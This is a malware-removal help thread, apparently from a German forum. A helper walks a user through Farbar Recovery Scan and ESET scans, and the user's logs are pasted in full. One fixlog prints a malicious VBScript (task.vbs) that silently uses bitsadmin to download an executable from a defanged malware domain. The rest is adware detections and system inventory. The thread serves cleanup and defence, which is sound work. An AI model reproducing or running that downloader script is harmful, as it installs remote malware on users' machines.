2015-09-19 12:14 - 2009-06-10 23:00 - 00000824 _____ C:\Windows\system32\Drivers\etc\hp.bak
AlternateDataStreams: C:\ProgramData\TEMP:373E1720

Please save this as Fixlist.txt on your desktop (or in the directory where FRST is located).
Step 2: Please start FRST again and press Scan. So in your next reply, please post:
__________________ Regards, Rafael ~ I'm storm. I'm calm. I'm fire. I'm ice. I'm burningice. ~ Support us with a donation ......... Praise, criticism or requests ......... .......... Follow us on Facebook .......... |
27.09.2015, 20:12 | #10 |
| Malware-gen, Adware-gen ...etc. Thanks for picking this back up. Fixlog Code:
ATTFilter
Entferungsergebnis von Farbar Recovery Scan Tool (x64) Version:23-09-2015
durchgeführt von Kenny G (2015-09-27 20:46:05) Run:1
Gestartet von C:\Users\Kenny G\Downloads
Geladene Profile: Kenny G & UpdatusUser (Verfügbare Profile: Kenny G & UpdatusUser & eLoot & Tabea Studium)
Start-Modus: Normal
==============================================
fixlist Inhalt:
*****************
CloseProcesses:
R2 zuroluxy; C:\Program Files (x86)\Could not connect. Error code = 0x-1442657579---\knsl4AC.tmpfs [X]
C:\Program Files (x86)\Could not connect. Error code = 0x-1442657579---\
HKLM Group Policy restriction on software: C:\Program Files\BitDefender
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung
HKU\S-1-5-21-682121585-3582832733-1082443493-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung
HKU\S-1-5-21-682121585-3582832733-1082443493-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung
2015-09-20 19:00 - 2015-09-20 19:00 - 03237248 _____ (Enigma Software Group USA, LLC.) C:\Users\Kenny G\Downloads\SpyHunter-Installer.exe
2015-09-19 17:25 - 2015-09-21 18:10 - 00000000 ____D C:\Program Files (x86)\Trojan Remover
cmd: type C:\task.vbs
2015-09-19 12:15 - 2015-09-19 12:15 - 00000000 ____D C:\Users\Kenny G\AppData\Local\Could not connect. Error code = 0x-1442664913---
2015-09-19 12:14 - 2009-06-10 23:00 - 00000824 _____ C:\Windows\system32\Drivers\etc\hp.bak
AlternateDataStreams: C:\ProgramData\TEMP:373E1720
*****************
Prozess erfolgreich geschlossen.
zuroluxy => Dienst erfolgreich entfernt
C:\Program Files (x86)\Could not connect. Error code = 0x-1442657579--- => erfolgreich verschoben
HKLM Group Policy restriction on software: C:\Program Files\BitDefender => erfolgreich wiederhergestellt
"HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer" => Schlüssel erfolgreich entfernt
"HKU\S-1-5-21-682121585-3582832733-1082443493-1000\SOFTWARE\Policies\Microsoft\Internet Explorer" => Schlüssel erfolgreich entfernt
HKU\S-1-5-21-682121585-3582832733-1082443493-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\Policies\Microsoft\Internet Explorer => Schlüssel nicht gefunden.
C:\Users\Kenny G\Downloads\SpyHunter-Installer.exe => erfolgreich verschoben
C:\Program Files (x86)\Trojan Remover => erfolgreich verschoben
========= type C:\task.vbs =========
Set WshShell = CreateObject("WScript.Shell")
cmds=WshShell.RUN("bitsadmin /transfer amijob /download /priority high hxxp://www.nice-doggy.xyz/run/Updater.exe %TEMP%/Updater.exe",0, False)
WScript.Sleep 300000
cmds=WshShell.RUN("bitsadmin /cancel amijob",0, False)
Set WshShell = Nothing
Set WshShell = CreateObject("WScript.Shell")
cmds=WshShell.RUN("bitsadmin /transfer amijob /download /priority high hxxp://www.nice-doggy.xyz/run/Updater.exe %TEMP%/Updater.exe",0, False)
WScript.Sleep 300000
cmds=WshShell.RUN("bitsadmin /cancel amijob",0, False)
Set WshShell = Nothing
========= Ende von CMD: =========
C:\Users\Kenny G\AppData\Local\Could not connect. Error code = 0x-1442664913--- => erfolgreich verschoben
C:\Windows\system32\Drivers\etc\hp.bak => erfolgreich verschoben
C:\ProgramData\TEMP => ":373E1720" ADS erfolgreich entfernt.
Das System musste neu gestartet werden..
==== Ende von Fixlog 20:46:07 ====

I have uploaded the file. I hope that is OK. FRST.txt hxxp://www.file-upload.net/download-10938270/FRST.txt.html |
28.09.2015, 13:42 | #11 |
/// Malwareteam | Malware-gen, Adware-gen ...etc. Please post your result between code tags next time. If a log is too long, please split it across several replies. Code tags? Simply press the # in the reply window and paste the log in between. Step 1: ESET Online Scanner
Question: Do you still notice any problems with your computer? So in your next reply, please post:
__________________ Regards, Rafael |
28.09.2015, 21:53 | #12 |
| Malware-gen, Adware-gen ...etc. OK, the online scan is running. Unfortunately I notice that my computer has become very slow. I have already defragmented it and tidied it up so far. I have deleted almost all programs that open at startup. I think there are still some processes open that are stealing performance. Without having opened anything, I have 39% physical memory usage after startup. CPU usage is also mostly at 80-90% in normal use. So, the ESET log will follow in a few minutes. Thank you very much for your efforts. Code:
ATTFilter ESETSmartInstaller@High as downloader log: all ok # product=EOS # version=8 # OnlineScannerApp.exe=1.0.0.1 # EOSSerial=d3d2521426185d4e97455a3ab13cddc3 # end=init # utc_time=2015-09-28 04:14:01 # local_time=2015-09-28 06:14:01 (+0100, Mitteleuropäische Sommerzeit) # country="Germany" # osver=6.1.7601 NT Service Pack 1 Update Init Update Download Update Finalize Updated modules version: 25979 # product=EOS # version=8 # OnlineScannerApp.exe=1.0.0.1 # EOSSerial=d3d2521426185d4e97455a3ab13cddc3 # end=updated # utc_time=2015-09-28 04:34:26 # local_time=2015-09-28 06:34:26 (+0100, Mitteleuropäische Sommerzeit) # country="Germany" # osver=6.1.7601 NT Service Pack 1 # product=EOS # version=8 # OnlineScannerApp.exe=1.0.0.1 # OnlineScanner.ocx=1.0.0.7777 # api_version=3.1.1 # EOSSerial=d3d2521426185d4e97455a3ab13cddc3 # engine=25979 # end=stopped # remove_checked=false # archives_checked=true # unwanted_checked=true # unsafe_checked=false # antistealth_checked=true # utc_time=2015-09-28 05:33:39 # local_time=2015-09-28 07:33:39 (+0100, Mitteleuropäische Sommerzeit) # country="Germany" # lang=1031 # osver=6.1.7601 NT Service Pack 1 # compatibility_mode_1='AVG Internet Security 2015' # compatibility_mode=1053 16777213 100 100 485436 130595603 0 0 # compatibility_mode_1='' # compatibility_mode=5893 16776574 100 94 476626 195091469 0 0 # scanned=118538 # found=10 # cleaned=0 # scan_time=3553 sh=2BD678306E8D4F03D1CC0653593BCA7428AC2994 ft=1 fh=377f99cd72e631f0 vn="Win32/Adware.ConvertAd.YY Anwendung" ac=I fn="C:\FRST\Quarantine\C\Program Files (x86)\Could not connect. Error code = 0x-1442657579---\Uninstall.exe" sh=C2BF9E02AAF8CD61356523AF0425BD4DEEE8A0E8 ft=1 fh=aed2a53e39c1b826 vn="Variante von Win32/ClientConnect.A evtl. 
unerwünschte Anwendung" ac=I fn="C:\System Volume Information\SystemRestore\FRStaging\Program Files (x86)\SearchProtect\SearchProtect\bin\SPTool64.exe" sh=6C0CFF21847BEBDC22C8ED1C8A24ED19724D7741 ft=1 fh=91d5fb4f6ab1ad55 vn="Variante von Win32/ClientConnect.A evtl. unerwünschte Anwendung" ac=I fn="C:\System Volume Information\SystemRestore\FRStaging\Program Files (x86)\SearchProtect\SearchProtect\bin\SPVC32Loader.dll" sh=19D4CD0E4DDB51C3B3A25676F68963807BE1710C ft=1 fh=5c3c9fe0db73a8b4 vn="Variante von Win32/ClientConnect.A evtl. unerwünschte Anwendung" ac=I fn="C:\System Volume Information\SystemRestore\FRStaging\Program Files (x86)\SearchProtect\SearchProtect\bin\SPVC64.dll" sh=1FBCCE3ECEBD5955F90E91C6B6B74EE06783CD66 ft=1 fh=cdd42cd0b2145c18 vn="Variante von Win32/ClientConnect.A evtl. unerwünschte Anwendung" ac=I fn="C:\System Volume Information\SystemRestore\FRStaging\Users\Kenny G\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\U0VHME7J\spstub[1].exe" sh=007D1E44C119A31982147BA37DD4FBDABEB6C999 ft=1 fh=313da661c7196dc6 vn="Variante von Win32/DownloadSponsor.C evtl. unerwünschte Anwendung" ac=I fn="C:\Users\Kenny G\Desktop\Alles\bewerbung\Cloud Downloader - CHIP-Installer.exe" sh=93091732597AD0F0F31341E9832C7458C818C21A ft=1 fh=2ac8f15dc6f2a69a vn="Variante von Win32/DownloadSponsor.C evtl. unerwünschte Anwendung" ac=I fn="C:\Users\Kenny G\Desktop\Alles\bewerbung\CyberGhost VPN - CHIP-Installer.exe" sh=B68376C1A0CF757B88FFB0334C12284E7976247D ft=1 fh=f6db6822da216b21 vn="Variante von Win32/DownloadSponsor.C evtl. unerwünschte Anwendung" ac=I fn="C:\Users\Kenny G\Desktop\Alles\bewerbung\TeamSpeak 3 32 Bit - CHIP-Installer.exe" sh=B91FA855B8EA4831EBF39C3764FD783349945731 ft=1 fh=c33ed40735587d9b vn="Variante von Win32/DownloadSponsor.C evtl. 
unerwünschte Anwendung" ac=I fn="C:\Users\Kenny G\Desktop\Alles\bewerbung\Xilisoft iPhone Magic - CHIP-Installer.exe" sh=11C17EF8DBE952B6D870268AD3CA48BAAE140D61 ft=1 fh=403a0c0db8e0bd60 vn="Mehrere Bedrohungen" ac=I fn="C:\Users\Kenny G\Desktop\Neuer Ordner (3)\Microsoft Toolkit.exe" ESETSmartInstaller@High as downloader log: all ok # product=EOS # version=8 # OnlineScannerApp.exe=1.0.0.1 # EOSSerial=d3d2521426185d4e97455a3ab13cddc3 # end=init # utc_time=2015-09-28 05:34:33 # local_time=2015-09-28 07:34:33 (+0100, Mitteleuropäische Sommerzeit) # country="Germany" # osver=6.1.7601 NT Service Pack 1 Update Init Update Download esets_scanner_update returned -1 esets_gle=53251 Update Finalize Updated modules version: 25979 # product=EOS # version=8 # OnlineScannerApp.exe=1.0.0.1 # EOSSerial=d3d2521426185d4e97455a3ab13cddc3 # end=updated # utc_time=2015-09-28 05:34:55 # local_time=2015-09-28 07:34:55 (+0100, Mitteleuropäische Sommerzeit) # country="Germany" # osver=6.1.7601 NT Service Pack 1 # product=EOS # version=8 # OnlineScannerApp.exe=1.0.0.1 # OnlineScanner.ocx=1.0.0.7777 # api_version=3.1.1 # EOSSerial=d3d2521426185d4e97455a3ab13cddc3 # engine=25979 # end=finished # remove_checked=false # archives_checked=true # unwanted_checked=true # unsafe_checked=false # antistealth_checked=true # utc_time=2015-09-28 07:33:21 # local_time=2015-09-28 09:33:21 (+0100, Mitteleuropäische Sommerzeit) # country="Germany" # lang=1031 # osver=6.1.7601 NT Service Pack 1 # compatibility_mode_1='AVG Internet Security 2015' # compatibility_mode=1053 16777213 100 100 492618 130602785 0 0 # compatibility_mode_1='' # compatibility_mode=5893 16776574 100 94 483808 195098651 0 0 # scanned=265179 # found=16 # cleaned=0 # scan_time=7105 sh=2BD678306E8D4F03D1CC0653593BCA7428AC2994 ft=1 fh=377f99cd72e631f0 vn="Win32/Adware.ConvertAd.YY Anwendung" ac=I fn="C:\FRST\Quarantine\C\Program Files (x86)\Could not connect. 
Error code = 0x-1442657579---\Uninstall.exe" sh=C2BF9E02AAF8CD61356523AF0425BD4DEEE8A0E8 ft=1 fh=aed2a53e39c1b826 vn="Variante von Win32/ClientConnect.A evtl. unerwünschte Anwendung" ac=I fn="C:\System Volume Information\SystemRestore\FRStaging\Program Files (x86)\SearchProtect\SearchProtect\bin\SPTool64.exe" sh=6C0CFF21847BEBDC22C8ED1C8A24ED19724D7741 ft=1 fh=91d5fb4f6ab1ad55 vn="Variante von Win32/ClientConnect.A evtl. unerwünschte Anwendung" ac=I fn="C:\System Volume Information\SystemRestore\FRStaging\Program Files (x86)\SearchProtect\SearchProtect\bin\SPVC32Loader.dll" sh=19D4CD0E4DDB51C3B3A25676F68963807BE1710C ft=1 fh=5c3c9fe0db73a8b4 vn="Variante von Win32/ClientConnect.A evtl. unerwünschte Anwendung" ac=I fn="C:\System Volume Information\SystemRestore\FRStaging\Program Files (x86)\SearchProtect\SearchProtect\bin\SPVC64.dll" sh=1FBCCE3ECEBD5955F90E91C6B6B74EE06783CD66 ft=1 fh=cdd42cd0b2145c18 vn="Variante von Win32/ClientConnect.A evtl. unerwünschte Anwendung" ac=I fn="C:\System Volume Information\SystemRestore\FRStaging\Users\Kenny G\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\U0VHME7J\spstub[1].exe" sh=007D1E44C119A31982147BA37DD4FBDABEB6C999 ft=1 fh=313da661c7196dc6 vn="Variante von Win32/DownloadSponsor.C evtl. unerwünschte Anwendung" ac=I fn="C:\Users\Kenny G\Desktop\Alles\bewerbung\Cloud Downloader - CHIP-Installer.exe" sh=93091732597AD0F0F31341E9832C7458C818C21A ft=1 fh=2ac8f15dc6f2a69a vn="Variante von Win32/DownloadSponsor.C evtl. unerwünschte Anwendung" ac=I fn="C:\Users\Kenny G\Desktop\Alles\bewerbung\CyberGhost VPN - CHIP-Installer.exe" sh=B68376C1A0CF757B88FFB0334C12284E7976247D ft=1 fh=f6db6822da216b21 vn="Variante von Win32/DownloadSponsor.C evtl. unerwünschte Anwendung" ac=I fn="C:\Users\Kenny G\Desktop\Alles\bewerbung\TeamSpeak 3 32 Bit - CHIP-Installer.exe" sh=B91FA855B8EA4831EBF39C3764FD783349945731 ft=1 fh=c33ed40735587d9b vn="Variante von Win32/DownloadSponsor.C evtl. 
unerwünschte Anwendung" ac=I fn="C:\Users\Kenny G\Desktop\Alles\bewerbung\Xilisoft iPhone Magic - CHIP-Installer.exe" sh=11C17EF8DBE952B6D870268AD3CA48BAAE140D61 ft=1 fh=403a0c0db8e0bd60 vn="Mehrere Bedrohungen" ac=I fn="C:\Users\Kenny G\Desktop\Neuer Ordner (3)\Microsoft Toolkit.exe" sh=C3937102B74AAE33C7725020F68D998A99CD044B ft=1 fh=6e4c94e4e7dedc70 vn="Win32/Somoto.Q evtl. unerwünschte Anwendung" ac=I fn="C:\Users\Kenny G\Desktop\nintendo 64\setup_Project64_2.1-2.exe" sh=3DC4F21FC0E7F3F7D9F790CB87EC114A7C318E02 ft=1 fh=15e73219a331f799 vn="Variante von Win32/DownloadSponsor.C evtl. unerwünschte Anwendung" ac=I fn="C:\Users\Kenny G\Downloads\Traktor Pro 2 - CHIP-Installer.exe" sh=4931F7FA7A81FDEDA2A91C0E65D6C32EC1284F01 ft=1 fh=ad8674ccbb043117 vn="Variante von Win32/DownloadSponsor.C evtl. unerwünschte Anwendung" ac=I fn="C:\Users\Kenny G\Downloads\Trojan Remover - CHIP-Installer.exe" sh=F1E5D784B1071F8D5F1E3EAAFE23A70833C46E6F ft=1 fh=af8d05d80c1de300 vn="Win32/Adware.ConvertAd.YY Anwendung" ac=I fn="C:\Windows\temp\29AF.tmp.exe" sh=C5B16F532AE1A977A27A8BF74C573823BD510087 ft=1 fh=aff3beb2a54e6882 vn="Variante von Win32/Adware.ConvertAd.WZ.gen Anwendung" ac=I fn="C:\Windows\temp\622C.tmp.exe" sh=42F595E9602BCC78FAB840104B0EC910C4B7B3C9 ft=1 fh=7ae27ef58399bc29 vn="Win32/Adware.ConvertAd.YY Anwendung" ac=I fn="C:\Windows\temp\8CA5.tmp.exe"
Edited by Zympop (28.09.2015 at 21:58) |
29.09.2015, 09:53 | #13 |
/// Malwareteam | Malware-gen, Adware-gen ...etc. Thanks for your reply. The fact that your PC is currently slow or has high CPU usage does not necessarily mean that it is infected. Based on the information and logs available to me, your computer now appears to be free of active malware. Step 1: Please press the Windows key + R and type notepad into the Run window. Now copy the following text from the code box into the empty text document. Code:
ATTFilter
CloseProcesses:
C:\task.vbs
C:\Users\Kenny G\Desktop\Neuer Ordner (3)\Microsoft Toolkit.exe
EmptyTemp:

Please save this as Fixlist.txt on your desktop (or in the directory where FRST is located).
Note: Chip Installer. Please be careful when you want to download software from Chip or other portals: Note: Use of cracks and illegal software. You have used cracks or illegal software on your computer. Please read and consider the following article: http://www.trojaner-board.de/95394-c...-software.html Step 2: Please start FRST again, tick the Addition box and press Scan (Untersuchen). So in your next reply, please post:
__________________ Regards, Rafael |
29.09.2015, 14:11 | #14 |
| Malware-gen, Adware-gen ...etc. Thanks for the reply. Yes, I don't notice anything else either. However, I wonder why the ESET online scan found 10-16 things. Shouldn't these be cleaned? That my computer has become so slow is probably really due to my usage. I just have to tidy it up even more. You haven't noticed any unnecessary processes so far? Here are the logs: Fixlist Code:
ATTFilter
Entferungsergebnis von Farbar Recovery Scan Tool (x64) Version:23-09-2015
durchgeführt von Kenny G (2015-09-29 09:40:54) Run:2
Gestartet von C:\Users\Kenny G\Downloads
Geladene Profile: Kenny G & UpdatusUser (Verfügbare Profile: Kenny G & UpdatusUser & eLoot & Tabea Studium)
Start-Modus: Normal
==============================================
fixlist Inhalt:
*****************
CloseProcesses:
C:\task.vbs
C:\Users\Kenny G\Desktop\Neuer Ordner (3)\Microsoft Toolkit.exe
EmptyTemp:
*****************
Prozess erfolgreich geschlossen.
C:\task.vbs => erfolgreich verschoben
C:\Users\Kenny G\Desktop\Neuer Ordner (3)\Microsoft Toolkit.exe => erfolgreich verschoben
EmptyTemp: => 968.9 MB temporäre Dateien entfernt.
Das System musste neu gestartet werden..
==== Ende von Fixlog 09:41:36 ====
Code:
ATTFilter Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version:23-09-2015 durchgeführt von Kenny G (2015-09-29 09:51:02) Gestartet von C:\Users\Kenny G\Downloads Windows 7 Ultimate Service Pack 1 (X64) (2013-10-01 16:18:55) Start-Modus: Normal ========================================================== ==================== Konten: ============================= Administrator (S-1-5-21-682121585-3582832733-1082443493-500 - Administrator - Disabled) eLoot (S-1-5-21-682121585-3582832733-1082443493-1008 - Administrator - Enabled) => C:\Users\eLoot Gast (S-1-5-21-682121585-3582832733-1082443493-501 - Limited - Disabled) HomeGroupUser$ (S-1-5-21-682121585-3582832733-1082443493-1002 - Limited - Enabled) Kenny G (S-1-5-21-682121585-3582832733-1082443493-1000 - Administrator - Enabled) => C:\Users\Kenny G Tabea Studium (S-1-5-21-682121585-3582832733-1082443493-1009 - Limited - Enabled) => C:\Users\Tabea Studium UpdatusUser (S-1-5-21-682121585-3582832733-1082443493-1007 - Limited - Enabled) => C:\Users\UpdatusUser ==================== Sicherheits-Center ======================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.) AV: AVG Internet Security 2015 (Enabled - Up to date) {4D41356F-32AD-7C42-C820-63775EE4F413} AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: AVG Internet Security 2015 (Enabled - Up to date) {F620D48B-1497-73CC-F290-58052563BEAE} FW: AVG Internet Security 2015 (Enabled) {757AB44A-78C2-7D1A-E37F-CA42A037B368} ==================== Installierte Programme ====================== (Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.) 
888poker (HKLM-x32\...\888poker) (Version: - ) aborange Crypter - Deinstallation (HKLM-x32\...\aborange Crypter_is1) (Version: 3.10 - Mathias Gerlach [aborange.de]) Adobe Flash Player 18 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 18.0.0.232 - Adobe Systems Incorporated) Adobe Flash Player 18 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 18.0.0.232 - Adobe Systems Incorporated) Adobe Flash Player 18 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 18.0.0.232 - Adobe Systems Incorporated) Adobe Reader XI (11.0.12) - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AB0000000001}) (Version: 11.0.12 - Adobe Systems Incorporated) Apple Application Support (HKLM-x32\...\{46F044A5-CE8B-4196-984E-5BD6525E361D}) (Version: 2.3.6 - Apple Inc.) Apple Mobile Device Support (HKLM\...\{2EF5D87E-B7BD-458F-8428-E4D0B8B4E65C}) (Version: 7.0.0.117 - Apple Inc.) Auslogics DiskDefrag (HKLM-x32\...\{DF6A13C0-77DF-41FE-BD05-6D5201EB0CE7}_is1) (Version: 4.4.2.0 - Auslogics Labs Pty Ltd) AVG 2015 (HKLM\...\AVG) (Version: 2015.0.6140 - AVG Technologies) AVG 2015 (Version: 15.0.4435 - AVG Technologies) Hidden AVG 2015 (Version: 15.0.6140 - AVG Technologies) Hidden AVG Web TuneUp (HKLM-x32\...\AVG Web TuneUp) (Version: 4.1.6.294 - AVG Technologies) Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment) Battlefield: Bad Company 2 (HKLM-x32\...\Steam App 24960) (Version: - DICE) Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.) CCleaner (HKLM\...\CCleaner) (Version: 4.06 - Piriform) CDBurnerXP (HKLM-x32\...\{7E265513-8CDA-4631-B696-F40D983F3B07}_is1) (Version: 4.5.5.5571 - CDBurnerXP) Cliqz (HKLM-x32\...\{5A0C0737-6AFE-4DC6-A8B4-6DFE509ACD75}_is1) (Version: 0.5.31 - Cliqz.com) Counter-Strike (HKLM-x32\...\Steam App 10) (Version: - Valve) Counter-Strike: Source (HKLM-x32\...\Steam App 240) (Version: - Valve) CyberGhost 5 (HKLM\...\CyberGhost 5_is1) (Version: - CyberGhost S.R.L.) 
DAEMON Tools Lite (HKLM\...\DAEMON Tools Lite) (Version: 10.1.0.0074 - Disc Soft Ltd) Free Alarm Clock 3.1.0 (HKLM-x32\...\{8ED5A2F1-338F-4608-8AF7-BCD1ADC1E1F7}_is1) (Version: 3.1 - Comfort Software Group) Free YouTube Download version 3.2.61.805 (HKLM-x32\...\Free YouTube Download_is1) (Version: 3.2.61.805 - DVDVideoSoft Ltd.) Free YouTube to MP3 Converter version 3.12.61.805 (HKLM-x32\...\Free YouTube to MP3 Converter_is1) (Version: 3.12.61.805 - DVDVideoSoft Ltd.) GIMP 2.8.10 (HKLM\...\GIMP-2_is1) (Version: 2.8.10 - The GIMP Team) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 45.0.2454.101 - Google Inc.) Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden Google Update Helper (x32 Version: 1.3.28.15 - Google Inc.) Hidden Hearthstone (HKLM-x32\...\Hearthstone) (Version: - Blizzard Entertainment) ICQ 8.2 (build 6901) (HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\ICQ) (Version: 8.2.6901.0 - ICQ) iTunes (HKLM\...\{A535111D-95C8-487F-869E-CE4C239972D2}) (Version: 11.1.1.11 - Apple Inc.) 
Java 7 Update 45 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217021FF}) (Version: 7.0.450 - Oracle) JetBoost (HKLM-x32\...\JetBoost_is1) (Version: 2.0.0 - BlueSprig) League of Legends (HKLM-x32\...\League of Legends 3.0.1) (Version: 3.0.1 - Riot Games ) League of Legends (x32 Version: 3.0.1 - Riot Games ) Hidden LibreOffice 4.2.2.1 (HKLM-x32\...\{0ECDB550-79ED-4E9E-851B-19A8B2B4EBFA}) (Version: 4.2.2.1 - The Document Foundation) Malwarebytes Anti-Malware Version 2.1.8.1057 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.1.8.1057 - Malwarebytes Corporation) Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation) Microsoft .NET Framework 4 Client Profile DEU Language Pack (HKLM\...\Microsoft .NET Framework 4 Client Profile DEU Language Pack) (Version: 4.0.30319 - Microsoft Corporation) Microsoft .NET Framework 4 Extended (HKLM\...\Microsoft .NET Framework 4 Extended) (Version: 4.0.30319 - Microsoft Corporation) Microsoft .NET Framework 4 Extended DEU Language Pack (HKLM\...\Microsoft .NET Framework 4 Extended DEU Language Pack) (Version: 4.0.30319 - Microsoft Corporation) Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.4518.1014 - Microsoft Corporation) Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.40728.0 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft 
Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation) Mozilla Firefox 41.0 (x86 de) (HKLM-x32\...\Mozilla Firefox 41.0 (x86 de)) (Version: 41.0 - Mozilla) Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 41.0.0.5738 - Mozilla) Mozilla Thunderbird 24.6.0 (x86 de) (HKLM-x32\...\Mozilla Thunderbird 24.6.0 (x86 de)) (Version: 24.6.0 - Mozilla) Native Instruments Audio 2 DJ Driver (HKLM-x32\...\Native Instruments Audio 2 DJ Driver) (Version: - Native Instruments) Native Instruments Audio 4 DJ Driver (HKLM-x32\...\Native Instruments Audio 4 DJ Driver) (Version: - Native Instruments) Native Instruments Audio 8 DJ Driver (HKLM-x32\...\Native Instruments Audio 8 DJ Driver) (Version: - Native Instruments) Native Instruments Controller Editor 
(HKLM-x32\...\Native Instruments Controller Editor) (Version: 1.8.2.281 - Native Instruments) Native Instruments Service Center (HKLM-x32\...\Native Instruments Service Center) (Version: 2.6.0.137 - Native Instruments) Native Instruments Traktor (HKLM-x32\...\Native Instruments Traktor) (Version: - Native Instruments) Native Instruments Traktor 2 (HKLM-x32\...\Native Instruments Traktor 2) (Version: 2.9.0.1257 - Native Instruments) Native Instruments Traktor Audio 2 Driver (HKLM-x32\...\Native Instruments Traktor Audio 2 Driver) (Version: - Native Instruments) Native Instruments Traktor Audio 2 MK2 Driver (HKLM-x32\...\Native Instruments Traktor Audio 2 MK2 Driver) (Version: - Native Instruments) Native Instruments Traktor Audio 6 Driver (HKLM-x32\...\Native Instruments Traktor Audio 6 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol D2 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol D2 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol F1 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol F1 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol S2 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol S2 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol S2 MK2 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol S2 MK2 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol S4 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol S4 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol S4 MK2 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol S4 MK2 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol S8 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol S8 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol X1 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol X1 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol X1 MK2 Driver 
